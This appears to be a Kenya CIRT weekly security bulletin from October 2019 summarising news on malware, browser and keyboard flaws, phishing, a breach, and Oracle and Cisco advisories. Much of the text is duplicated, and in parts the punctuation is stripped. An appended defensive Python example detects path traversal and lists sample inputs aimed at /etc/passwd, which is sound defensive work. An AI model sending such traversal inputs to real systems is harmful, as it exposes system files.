Source 1 Bleeping Computer ( httpswwwbleepingcomputercom ) httpswwwbleepingcomputercomnewssecurityhacker-plants-keylogger-devices-on-company-systems-faces-12yr-in-jailImpact value HighHacker Plants Keylogger Devices on Company Systems Faces 12yr in Jail A hacker admitted toplanting hardware keyloggers on computers belonging to two companies to getunauthorized to their networks and steal proprietary data He also added his laptop and ahard drive to the companys computer network He now faces 12 years of prison time Itappears that the individual was after data relating to an emerging technology that bothtargeted companies were developinghttpswwwbleepingcomputercomnewssecurityandroid-apps-identify-google-ips-to-delay-malicious-behaviorImpact value MediumAndroid Apps Identify Google IPs to Delay Malicious Behaviour Dozens of Android appsdesigned to flood phone screens with ads hide their malicious behavior when a Google IP isdetected Collectively they were installed 8 million times The developer of the 42 apps thatmade it into the official Android store added some tricks that made it more difficult toidentify the source of the adware on devicesSource 2 Threatpost ( httpsthreatpostcom )httpsthreatpostcomsurvey-finds-people-are-privacy-hypocrites149408Impact value InformativeSurvey Finds People are Privacy Hypocrites The surveymdashcommissioned by HP as part ofNational Cybersecurity Awareness Monthmdashfound that people are generally quite protectiveabout their own private data in the workplace and online even as we live more and more ofour lives publicly However they also tend to encroach on othersrsquo privacy when given theopportunity as a result of basic human nature according to the report called ldquoHP Creepersand Peekersrdquo The report by HP found that most people admit to looking at othersrsquo computerscreens and documents in the workplace while still keeping their own privacy top of mind

System vulnerabilities

Source 1 Threatpost ( httpsthreatpostcom ) httpsthreatpostcomcritical-firefox-bugs-arbitrary-code-execution149455Impact value CriticalFirefox Chrome Bugs Allow Arbitrary Code-Execution Critical vulnerabilities have beendiscovered in the Mozilla Firefox web browser and Firefox Extended Support Release(ESR) and a high-severity bug has been reported for Google Chrome all of which couldallow for arbitrary code execution The bugs were announced as part of larger updates (toChrome 78 stable channel release Firefox 70 and Firefox ESR 682) that also includedseveral fixes for high-severity and moderate flaws

httpsthreatpostcomfujitsu-wireless-keyboard-unpatched-flaws149477Impact value High Fujitsu Wireless Keyboard Plagued By Unpatched Flaws Two high-severity flaws discovered in a popular Fujitsu wireless keyboard set could allow attackers from a short distance away to ldquoeavesdroprdquo on passwords entered into the keyboards or even fully takeover a victimrsquos system

Source 2 Thenextweb ( httpsthreatpostcom ) httpsthenextwebcomsecurity20191023major-chinese-browser-maxthon-has-a-bug-that-allows-anyone-admin-accessImpact value High Major Chinese browser lsquoMaxthonrsquo has a bug that allows anyone admin access One of Chinalsquos most popular browsers Maxthon has a bug in its Windows version that can allow a hacker to take admin control and install malware A report by security firm SafeBreachnotes it reported the vulnerability in September

Malware

Source 1 Bleeping Computer ( httpswwwbleepingcomputercom ) Impact value Highhttpswwwbleepingcomputercomnewssecuritydiscord-turned-into-an-info-stealing-backdoor-by-new-malwareDiscord Turned Into an Info-Stealing Backdoor by New Malware Discovered by researcher MalwareHunterTeam earlier this month this malware is called Spidey Bot and when installed will add its own malicious JavaScript terminates and restart the Discord app in order for the new JavaScript changes to be executed Once started the JavaScript will execute various Discord API commands and JavaScript functions to collect a variety of information about the user that is then sent via a Discord webhook to the attacker

Source 2 Fireeye ( httpswwwfireeyecom ) httpswwwfireeyecomblogthreat-research201910shikata-ga-nai-encoder-still-going-stronghtmlImpact value HighShikata Ga Nai Encoder Still Going Strong Despite Metasploitrsquos over 15 yearexistence there are still core techniques that go undetected allowing maliciousactors to evade detection One of these core techniques is the Shikata Ga Nai(SGN) payload encoding scheme Modern detection systems have improveddramatically over the last several years and will often catch plain vanilla versionsof known malicious methods In many cases though if a threat actor knows whatthey are doing they can slightly modify existing code to bypass detection

DDoSBotnets

Source 1 Bleeping Computer ( httpswwwbleepingcomputercom ) httpswwwbleepingcomputercomnewssecuritynew-cpdos-web-cache-poisoning-attacks-impact-sites-using-popular-cdnsImpact value High New CPDoS Web Cache Poisoning Attacks Impact Sites Using Popular CDNs Details have emerged about a new class of web cache poisoning attacks that could be used to deny users access to resources delivered through a content delivery network (CDN)Named Cache-Poisoned Denial of Service (CPDoS) the new method has several variations and works by sending an HTTP request with a malformed header

Spam amp Phishing

Source 1 Zdnet ( httpswwwzdnetcom ) httpswwwzdnetcomarticleprolific-ceo-business-email-scam-leads-to-arrests-in-spainImpact value HighPhishing alert This fake email about a bank payment delivers trojan malware A highly customisable form of trojan malware has returned and is being distributed via phishing emails claiming that a payment is being made to a bank account Now researchers at Fortinet have uncovered a new Remcos campaign ndash with the new variant titled 250 Pro according to hard-coded strings in the malicious code that was compiled in September ndash indicating the freshness of this variant Available to crooks for as little as $58 the malware is an information stealer and surveillance tool using capabilities including keylogging taking screenshots and stealing clipboard contents to secretly take usernames and passwords from infected victims

Web Security

Source 1 Infosecurity ( https://www.infosecurity-magazine.com )
https://www.infosecurity-magazine.com/news/cashback-websites-double-breach/
Impact value High
Cash-back Websites Expose 2 TB of Sensitive Information. Money-saving websites used by over 3.5 million bargain hunters have leaked 2 terabytes of sensitive information onto the dark web. Data exposed by British website PouringPounds.com and Indian sister site CashKaro.com includes bank details, full names, mobile phone numbers, email addresses, plain-text passwords and usernames, IP addresses and more. Both sites are owned by PouringPounds Ltd. The double breach was discovered by a group of Safety Detectives researchers led by hacktivist and cybersecurity expert Anurag Sen. Researchers found the sensitive data in a publicly exposed database hosted on an elastic server without any password protection.

Bulletins

Source 1 US-CERT - Security Bulletin Mailing List ( http://www.us-cert.gov/cas/bulletins )

https://www.us-cert.gov/ncas/bulletins/sb19-294
Vulnerability Summary for the Week of October 14, 2019. Recorded by National Institute of Standards and Technology and National Vulnerability

Source 2 Oracle Security Bulletins ( http://www.oracle.com/technetwork/topics/security/alerts-086861.html )

https://www.oracle.com/security-alerts/cpuoct2019.html
Oracle Critical Patch Update Advisory - October 2019; advised action: run available security updates.

https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html
Oracle Security Alert Advisory - CVE-2019-2729, deserialization vulnerability in Oracle WebLogic Server exploitable without authentication requirements; advised action: run security updates.

https://www.oracle.com/technetwork/topics/security/bulletinjul2019-5600410.html
Oracle Solaris Third Party Bulletin - July 2019; advised action: apply necessary patches.

https://www.oracle.com/technetwork/topics/security/linuxbulletinjul2019-5600392.html
Oracle Linux Bulletin - July 2019; advised action: apply necessary Oracle Linux Bulletin fixes.

https://www.oracle.com/technetwork/topics/security/public-vuln-to-advisory-mapping-093627.html
Map of CVE to Advisory/Alert; advised action: apply the critical patch update for protection against known vulnerabilities.

https://www.oracle.com/technetwork/topics/security/ovmbulletinjul2019-5600406.html
Oracle VM Server for x86 Bulletin - July 2019; advised action: apply necessary Oracle VM Server for x86 Bulletin fixes.

Updates & Alerts

Source 1 Cisco Security Advisories & Alerts ( http://tools.cisco.com/security/center/publicationListing.x )

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-hyperflex-injection
Impact value High
Cisco HyperFlex Software Command Injection Vulnerability. The vulnerability is due to improper handling of malformed HTTP methods. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected system. A successful exploit could allow the attacker to gain unauthorized access to the system. Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191016-wlc-pathtrav
Impact value Medium
Cisco Wireless LAN Controller Path Traversal Vulnerability. This vulnerability is due to improper sanitization of user-supplied input in command-line parameters that describe filenames. An attacker could exploit this vulnerability by using directory traversal techniques to submit a path to a desired file location. A successful exploit could allow the attacker to view system files that may contain sensitive information.

www.ke-cirt.go.ke


Top Stories

Source 1 Bleeping Computer ( https://www.bleepingcomputer.com )
https://www.bleepingcomputer.com/news/security/hacker-plants-keylogger-devices-on-company-systems-faces-12yr-in-jail/
Impact value High
Hacker Plants Keylogger Devices on Company Systems, Faces 12yr in Jail. A hacker admitted to planting hardware keyloggers on computers belonging to two companies to get unauthorized access to their networks and steal proprietary data. He also added his laptop and a hard drive to the company's computer network. He now faces 12 years of prison time. It appears that the individual was after data relating to an emerging technology that both targeted companies were developing.

https://www.bleepingcomputer.com/news/security/android-apps-identify-google-ips-to-delay-malicious-behavior/
Impact value Medium
Android Apps Identify Google IPs to Delay Malicious Behaviour. Dozens of Android apps designed to flood phone screens with ads hide their malicious behavior when a Google IP is detected. Collectively they were installed 8 million times. The developer of the 42 apps that made it into the official Android store added some tricks that made it more difficult to identify the source of the adware on devices.

Source 2 Threatpost ( https://threatpost.com )
https://threatpost.com/survey-finds-people-are-privacy-hypocrites/149408/
Impact value Informative
Survey Finds People are Privacy Hypocrites. The survey, commissioned by HP as part of National Cybersecurity Awareness Month, found that people are generally quite protective about their own private data in the workplace and online, even as we live more and more of our lives publicly. However, they also tend to encroach on others' privacy when given the opportunity, as a result of basic human nature, according to the report called "HP Creepers and Peekers". The report by HP found that most people admit to looking at others' computer screens and documents in the workplace while still keeping their own privacy top of mind.

System vulnerabilities

Source 1 Threatpost ( https://threatpost.com )
https://threatpost.com/critical-firefox-bugs-arbitrary-code-execution/149455/
Impact value Critical
Firefox, Chrome Bugs Allow Arbitrary Code-Execution. Critical vulnerabilities have been discovered in the Mozilla Firefox web browser and Firefox Extended Support Release (ESR), and a high-severity bug has been reported for Google Chrome, all of which could allow for arbitrary code execution. The bugs were announced as part of larger updates (to Chrome 78 stable channel release, Firefox 70 and Firefox ESR 68.2) that also included several fixes for high-severity and moderate flaws.

https://threatpost.com/fujitsu-wireless-keyboard-unpatched-flaws/149477/
Impact value High
Fujitsu Wireless Keyboard Plagued By Unpatched Flaws. Two high-severity flaws discovered in a popular Fujitsu wireless keyboard set could allow attackers from a short distance away to "eavesdrop" on passwords entered into the keyboards or even fully take over a victim's system.

Source 2 Thenextweb ( https://threatpost.com )
https://thenextweb.com/security/2019/10/23/major-chinese-browser-maxthon-has-a-bug-that-allows-anyone-admin-access/
Impact value High
Major Chinese browser 'Maxthon' has a bug that allows anyone admin access. One of China's most popular browsers, Maxthon, has a bug in its Windows version that can allow a hacker to take admin control and install malware. A report by security firm SafeBreach notes it reported the vulnerability in September.

Malware

Source 1 Bleeping Computer ( https://www.bleepingcomputer.com )
https://www.bleepingcomputer.com/news/security/discord-turned-into-an-info-stealing-backdoor-by-new-malware/
Impact value High
Discord Turned Into an Info-Stealing Backdoor by New Malware. Discovered by researcher MalwareHunterTeam earlier this month, this malware is called Spidey Bot and, when installed, will add its own malicious JavaScript, then terminate and restart the Discord app in order for the new JavaScript changes to be executed. Once started, the JavaScript will execute various Discord API commands and JavaScript functions to collect a variety of information about the user, which is then sent via a Discord webhook to the attacker.




DDoSBotnets

Source 1 Bleeping Computer ( httpswwwbleepingcomputercom ) httpswwwbleepingcomputercomnewssecuritynew-cpdos-web-cache-poisoning-attacks-impact-sites-using-popular-cdnsImpact value High New CPDoS Web Cache Poisoning Attacks Impact Sites Using Popular CDNs Details have emerged about a new class of web cache poisoning attacks that could be used to deny users access to resources delivered through a content delivery network (CDN)Named Cache-Poisoned Denial of Service (CPDoS) the new method has several variations and works by sending an HTTP request with a malformed header

Spam amp Phishing

Source 1 Zdnet ( httpswwwzdnetcom ) httpswwwzdnetcomarticleprolific-ceo-business-email-scam-leads-to-arrests-in-spainImpact value HighPhishing alert This fake email about a bank payment delivers trojan malware A highly customisable form of trojan malware has returned and is being distributed via phishing emails claiming that a payment is being made to a bank account Now researchers at Fortinet have uncovered a new Remcos campaign ndash with the new variant titled 250 Pro according to hard-coded strings in the malicious code that was compiled in September ndash indicating the freshness of this variant Available to crooks for as little as $58 the malware is an information stealer and surveillance tool using capabilities including keylogging taking screenshots and stealing clipboard contents to secretly take usernames and passwords from infected victims

Web Security

Source 1 Infosecurity ( httpswwwinfosecurity-magazinecom )

httpswwwinfosecurity-magazinecomnewscashback-websites-double-breach

Impact value High

Cash-back Websites Expose 2 TB of Sensitive Information Money-saving websites

used by over 35 million bargain hunters have leaked 2 terabytes of sensitive

information onto the dark web Data exposed by British website PouringPoundscom

and Indian sister site CashKarocom includes bank details full names mobile phone

numbers email addresses plain-text passwords and usernames IP addresses and

more Both sites are owned by PouringPounds Ltd The double breach was discovered

by a group of Safety Detectives researchers led by hacktivist and cybersecurity expert

Anurag Sen Researchers found the sensitive data in a publicly exposed database

hosted on an elastic server without any password protection

Bulletins

Source 1: US-CERT - Security Bulletin Mailing List ( http://www.us-cert.gov/cas/bulletins )

https://www.us-cert.gov/ncas/bulletins/sb19-294 Vulnerability Summary for the Week of October 14, 2019. Recorded by National Institute of Standards and Technology and National Vulnerability

Source 2: Oracle Security Bulletins ( http://www.oracle.com/technetwork/topics/security/alerts-086861.html )

https://www.oracle.com/security-alerts/cpuoct2019.html Oracle Critical Patch Update Advisory - October 2019; advised action: run available security updates.

https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html Oracle Security Alert Advisory - CVE-2019-2729, deserialization vulnerability in Oracle WebLogic Server exploitable without authentication requirements; advised action: run security updates.

https://www.oracle.com/technetwork/topics/security/bulletinjul2019-5600410.html Oracle Solaris Third Party Bulletin - July 2019; advised action: apply necessary patches.

https://www.oracle.com/technetwork/topics/security/linuxbulletinjul2019-5600392.html Oracle Linux Bulletin - July 2019; advised action: apply necessary Oracle Linux Bulletin fixes.

https://www.oracle.com/technetwork/topics/security/public-vuln-to-advisory-mapping-093627.html Map of CVE to Advisory/Alert; advised action: apply the critical patch update for protection against known vulnerabilities.

https://www.oracle.com/technetwork/topics/security/ovmbulletinjul2019-5600406.html Oracle VM Server for x86 Bulletin - July 2019; advised action: apply necessary Oracle VM Server for x86 Bulletin fixes.

Updates & Alerts

Source 1: Cisco Security Advisories & Alerts ( http://tools.cisco.com/security/center/publicationListing.x )

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190220-hyperflex-injection

Impact value: High

Cisco HyperFlex Software Command Injection Vulnerability. The vulnerability is due to improper handling of malformed HTTP methods. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected system. A successful exploit could allow the attacker to gain unauthorized access to the system. Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191016-wlc-pathtrav

Impact value: Medium

Cisco Wireless LAN Controller Path Traversal Vulnerability. This vulnerability is due to improper sanitization of user-supplied input in command-line parameters that describe filenames. An attacker could exploit this vulnerability by using directory traversal techniques to submit a path to a desired file location. A successful exploit could allow the attacker to view system files that may contain sensitive information.
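The filename containment check whose absence the path traversal advisory describes, shown as a defender-side example added here (not code from the bulletin or from Cisco); the allowed root directory, the function names and the sample requests are constructed for the example:

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Hypothetical directory a file-serving parameter is allowed to reach
# (constructed for this example; not a real Cisco WLC path).
ALLOWED_ROOT = "/var/app/export"


def weak_resolve(filename: str) -> str:
    """The kind of handling the advisory describes as insufficient: the
    user-supplied filename is glued onto the base directory unchecked, so
    '../' segments are passed straight to the filesystem."""
    return ALLOWED_ROOT + "/" + filename


def safe_resolve(filename: str) -> Optional[str]:
    """Return the resolved path if it stays inside ALLOWED_ROOT, else None.

    The check is lexical (no filesystem access), so it can run on any
    host and can double as a log-side detector for traversal attempts.
    """
    if not filename or "\x00" in filename:
        return None
    # Validate the value that would actually reach the filesystem: decode
    # percent-encoding once so '..%2F..' is seen as '../..'.
    decoded = unquote(filename)
    # join() discards ALLOWED_ROOT when 'decoded' is absolute, and
    # normpath() collapses '.' and '..' segments; both cases are then
    # caught by the containment test below.
    candidate = posixpath.normpath(posixpath.join(ALLOWED_ROOT, decoded))
    # commonpath() compares whole path components, so a sibling such as
    # /var/app/export-old does not pass as a string-prefix match would.
    if posixpath.commonpath([ALLOWED_ROOT, candidate]) != ALLOWED_ROOT:
        return None
    return candidate


def flag_traversal_attempts(requested: list) -> list:
    """Detection helper: return the requested filenames that the safe
    check refuses, e.g. to raise an alert from request logs."""
    return [name for name in requested if safe_resolve(name) is None]


if __name__ == "__main__":
    # Constructed sample requests, including two traversal attempts.
    samples = ["reports/2019.csv", "../../etc/passwd", "..%2F..%2Fetc%2Fpasswd"]
    print(flag_traversal_attempts(samples))
```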

www.ke-cirt.go.ke
